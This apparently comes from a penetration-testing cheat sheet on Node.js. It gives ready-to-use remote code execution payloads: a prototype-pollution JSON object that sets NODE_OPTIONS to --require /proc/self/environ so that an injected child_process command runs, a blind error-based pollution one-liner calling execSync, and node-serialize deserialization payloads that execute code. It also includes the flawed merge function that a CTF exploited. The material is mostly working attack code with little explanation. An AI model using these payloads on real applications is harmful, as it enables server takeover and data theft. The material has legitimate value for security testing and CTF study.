NodeJS Polluting environment
Copy { "name" : "xct" , "constructor" :{ "prototype" : { "env" : { "AAAA" : "require('child_process').exec('cat *').stdout.pipe(process.stdout);//" , "NODE_OPTIONS" : "--require /proc/self/environ" }}} , "paper" : 10 }
By polluting the environment we can inject require to execute a local file. If we point this to /proc/self/environ and place an environment variable there we can execute code. On a ctf challenge this worked because of faulty merge method:
Copy merge (target , source) {
for ( let key in source) {
if ( this .isValidKey (key)){
if ( this .isObject (target[key]) && this .isObject (source[key])) {
this .merge (target[key] , source[key]);
} else {
target[key] = source[key];
}
}
}
return target;
} ,
NodeJS Blind Error based Pollution
Copy [(function test(xct){return ''[!xct?'__proto__':'constructor'][xct]})('constructor')('throw new Error(global.process.mainModule.constructor._load(\"child_process\").execSync(\" PAYLOAD \").toString())')()]
NodeJS Deserialization RCE
Copy var s = require('node-serialize');
s.unserialize(data);
Copy {"a":"_$$ND_FUNC$$_function(){console.log(\"xct\")}"}
{"a":"_$$ND_FUNC$$_function(){require('child_process').exec('...')}()"}